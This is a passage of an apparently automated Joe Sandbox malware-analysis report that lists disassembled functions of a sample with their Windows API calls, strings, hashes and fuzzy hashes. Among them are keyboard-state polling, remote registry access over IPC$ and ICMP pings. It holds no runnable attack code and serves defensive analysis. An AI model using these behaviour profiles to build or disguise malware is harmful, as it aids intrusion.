                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C5E754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C5E773
                                        • Sleep.KERNEL32(000000FA), ref: 00C5E77E
                                        • IsWindow.USER32 ref: 00C5E78A
                                        • EndDialog.USER32(00000000), ref: 00C5E79B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 32daf82001f52abbf5e90e9e9e1b22475aba32cb8fabb58868f9e854d8a34fd2
                                        • Instruction ID: 3740ee7fc0bc899101bbb5e1efd1b88cf40d8b105255be502b4ea2f1532718e4
                                        • Opcode Fuzzy Hash: 32daf82001f52abbf5e90e9e9e1b22475aba32cb8fabb58868f9e854d8a34fd2
                                        • Instruction Fuzzy Hash: 13215EB4200645AFEB045F61ECC9F2D3B69EB5538AF140425F855C11A1DF71AE48AB3C
                                        Function 00C5E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C5EA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C5EA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5EA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C5EA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5EAA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        • Opcode ID: c98a6cae73d9f4648663a05b3135c6b30cee06b2e9c36344bdf6f928daea6cdf
                                        • Instruction ID: c05e0618f848b71381f01320b289d5e8111abe7e57e62628eab91be6f5362fcd
                                        • Opcode Fuzzy Hash: c98a6cae73d9f4648663a05b3135c6b30cee06b2e9c36344bdf6f928daea6cdf
                                        • Instruction Fuzzy Hash: EF115135A9022D79D724A7A2DC4AEFF6ABCEBD1B40F000479B911A30D1EAB00A49C5B0
                                        Function 00C55CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00C55CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C55D59
                                        • GetDlgItem.USER32(?,00000002), ref: 00C55D69
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C55DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C55E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C55E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C55E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C55E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 339a70ec48f12a2d1a0efff51c5c42b870aff8b77438a1c1235673d711dde85f
                                        • Instruction ID: ff202213047905af5635e38ab1c4b8736ffe89448443462347f0988e873d1a14
                                        • Opcode Fuzzy Hash: 339a70ec48f12a2d1a0efff51c5c42b870aff8b77438a1c1235673d711dde85f
                                        • Instruction Fuzzy Hash: C9513E75A00609AFDF18CF68DD99BAEBBB5FF48301F108129F915E6290D770AE44CB64
                                        Function 00C08BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C08BE8,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08FC5
                                        • DestroyWindow.USER32(?), ref: 00C08C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00C46973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C469A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C469B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000), ref: 00C469D4
                                        • DeleteObject.GDI32(00000000), ref: 00C469E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 641708696-0
                                        • Opcode ID: 2de59bafcb4394ec9ab111e49bbd6d6fd8f08e6d76c6dd62450d5c271721cfa6
                                        • Instruction ID: 2bc4f9284f3d90fa1814e31d020a7d27be9e5561e91a00be2218a9b8d718ccb5
                                        • Opcode Fuzzy Hash: 2de59bafcb4394ec9ab111e49bbd6d6fd8f08e6d76c6dd62450d5c271721cfa6
                                        • Instruction Fuzzy Hash: FB61F130102710DFDB219F16D948B2A77F1FB52312F18851CE492979E4CB71AE84EF65
                                        Function 00C09838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        • GetSysColor.USER32(0000000F), ref: 00C09862
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 5d36e1e511840128702ca7cfd7e9f30568a2fe8d98bfc203fca93d5578017fe1
                                        • Instruction ID: 4b2a04dacaaf62ef965715770891cbc98865b906e7a932193c6bd7eaa424046f
                                        • Opcode Fuzzy Hash: 5d36e1e511840128702ca7cfd7e9f30568a2fe8d98bfc203fca93d5578017fe1
                                        • Instruction Fuzzy Hash: B1417C71104640AFDB205B399C88BBA3BA5FB46330F148715F9B28B2E3D7319942DB21
                                        Function 00C596E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C59717
                                        • LoadStringW.USER32(00000000,?,00C3F7F8,00000001), ref: 00C59720
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C59742
                                        • LoadStringW.USER32(00000000,?,00C3F7F8,00000001), ref: 00C59745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C59866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        • Opcode ID: 97b3aebdb98c994ee58cf38d97d2a537765b3ef15d5194d6f1691aedf73a9ae1
                                        • Instruction ID: 1ea9dc15577c1cec4f5c98239613b108e1702c216b7f0ebf8eb493b39f36ce99
                                        • Opcode Fuzzy Hash: 97b3aebdb98c994ee58cf38d97d2a537765b3ef15d5194d6f1691aedf73a9ae1
                                        • Instruction Fuzzy Hash: 93411A7280021DAACB15EBA0DD86EFEB7B8EF14741F1400A5F60573092EA356F4CDB65
                                        Function 00C506DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C507A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C507BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C507DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C50804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C5082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C50837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5083C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        • Opcode ID: 333807b2bfb2ebf2454c33816d4f6a39fd51f0ef5a59d818d2406553831fd64f
                                        • Instruction ID: d7fb316690782dcf90991efca4ee1ce5f4f21495f5699bc81180ecdc5d9f32f3
                                        • Opcode Fuzzy Hash: 333807b2bfb2ebf2454c33816d4f6a39fd51f0ef5a59d818d2406553831fd64f
                                        • Instruction Fuzzy Hash: 06412676C1022CABCF15EBA4DC85DFDB7B8BF04780F144169E911A31A1EB309E48CBA0
                                        Function 00C73C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C73C5C
                                        • CoInitialize.OLE32(00000000), ref: 00C73C8A
                                        • CoUninitialize.OLE32 ref: 00C73C94
                                        • _wcslen.LIBCMT ref: 00C73D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00C73DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C73ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C73F0E
                                        • CoGetObject.OLE32(?,00000000,00C8FB98,?), ref: 00C73F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 00C73F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C73FC4
                                        • VariantClear.OLEAUT32(?), ref: 00C73FD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: b86a7fc42038648a85720ac068ad96fd806bbee3e3fa9ef14377fdeccf9eb5e1
                                        • Instruction ID: 56d4afe0b30879eb387079deda037a7a28a00e9915cbd99300a2323b8c91315c
                                        • Opcode Fuzzy Hash: b86a7fc42038648a85720ac068ad96fd806bbee3e3fa9ef14377fdeccf9eb5e1
                                        • Instruction Fuzzy Hash: BEC166716083459FC700DF68C884A2BBBE9FF89748F10895DF98A9B250D731EE45DB62
                                        Function 00C67A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00C67AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C67B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00C67BA3
                                        • CoCreateInstance.OLE32(00C8FD08,00000000,00000001,00CB6E6C,?), ref: 00C67BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C67C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 00C67CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00C67D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C67D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 00C67D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 00C67DD6
                                        • CoUninitialize.OLE32 ref: 00C67DDC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: 5b52ccb478b51c658e240458824293407999a36fbb8aafe78dac4309a6558a18
                                        • Instruction ID: e8179caebdb7c4eaedb7adbbb88914c2e9d831b7e52125b69a0376f571c17ce6
                                        • Opcode Fuzzy Hash: 5b52ccb478b51c658e240458824293407999a36fbb8aafe78dac4309a6558a18
                                        • Instruction Fuzzy Hash: 0CC1FB75A04109AFCB14DFA4C8D8DAEBBF9FF48308B148599F9199B261D730EE45CB90
                                        Function 00C8541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C85504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C85515
                                        • CharNextW.USER32(00000158), ref: 00C85544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C85585
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C8559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C855AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: 2b1da14d91337fbc2f645e65144b074dafc41ee44389d745e6cd192524efeee7
                                        • Instruction ID: f4a4afe890a845f5dba133f5da5e7887178ad97783a298cf69971d649b8f4c5b
                                        • Opcode Fuzzy Hash: 2b1da14d91337fbc2f645e65144b074dafc41ee44389d745e6cd192524efeee7
                                        • Instruction Fuzzy Hash: 3F61AE74900608EFDF10AF95CC84EFE7BB9EF09329F104155F925A72A0D7B49A81DB68
                                        Function 00C4FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C4FAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00C4FB08
                                        • VariantInit.OLEAUT32(?), ref: 00C4FB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C4FB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 00C4FB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C4FBA1
                                        • VariantClear.OLEAUT32(?), ref: 00C4FBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00C4FBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C4FBCC
                                        • VariantClear.OLEAUT32(?), ref: 00C4FBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C4FBE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 191749970d27c24476be0c49723f77c9a81618a368c3833ffda9f6589b547688
                                        • Instruction ID: 4d445729915d06ec2ca806eb6de89eb1d208914ca19f5c7697b5913b2a0454d0
                                        • Opcode Fuzzy Hash: 191749970d27c24476be0c49723f77c9a81618a368c3833ffda9f6589b547688
                                        • Instruction Fuzzy Hash: 23414275A00219DFCB04DF64DC98EBEBBB9FF48344F008069E955A7261C730A986CFA0
                                        Function 00C59C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00C59CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C59D22
                                        • GetKeyState.USER32(000000A0), ref: 00C59D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C59D57
                                        • GetKeyState.USER32(000000A1), ref: 00C59D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00C59D84
                                        • GetKeyState.USER32(00000011), ref: 00C59D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 00C59DAE
                                        • GetKeyState.USER32(00000012), ref: 00C59DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C59DD8
                                        • GetKeyState.USER32(0000005B), ref: 00C59DEA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 2ac581a34b300d351e16407793a9385bea4ac917c22e7683045d765e5ef55d52
                                        • Instruction ID: 250bffad8adba6948933f5208e6a5f59d16a49d632f41c782d77385b72c9eeb8
                                        • Opcode Fuzzy Hash: 2ac581a34b300d351e16407793a9385bea4ac917c22e7683045d765e5ef55d52
                                        • Instruction Fuzzy Hash: 8741C7385047C9A9FF31866488443A5BEB0EB11345F0480DADED6565C2E7B5ABCCC7AA
                                        Function 00C7055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00C705BC
                                        • inet_addr.WSOCK32(?), ref: 00C7061C
                                        • gethostbyname.WSOCK32(?), ref: 00C70628
                                        • IcmpCreateFile.IPHLPAPI ref: 00C70636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C706C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C706E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00C707B9
                                        • WSACleanup.WSOCK32 ref: 00C707BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 82e2a5e3dbd900337d87bbd93459ee02e92aafd9cd28ee94ff998dfba9cd79f6
                                        • Instruction ID: e64d8d582c239195d1345dffebf707a6785797e3bdd51571b9ea94351663e437
                                        • Opcode Fuzzy Hash: 82e2a5e3dbd900337d87bbd93459ee02e92aafd9cd28ee94ff998dfba9cd79f6
                                        • Instruction Fuzzy Hash: 97916C35604201DFD724DF15C899F1ABBE4AF44318F24C5A9F5698B6A2C730ED85CF91
                                        Function 00C78CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
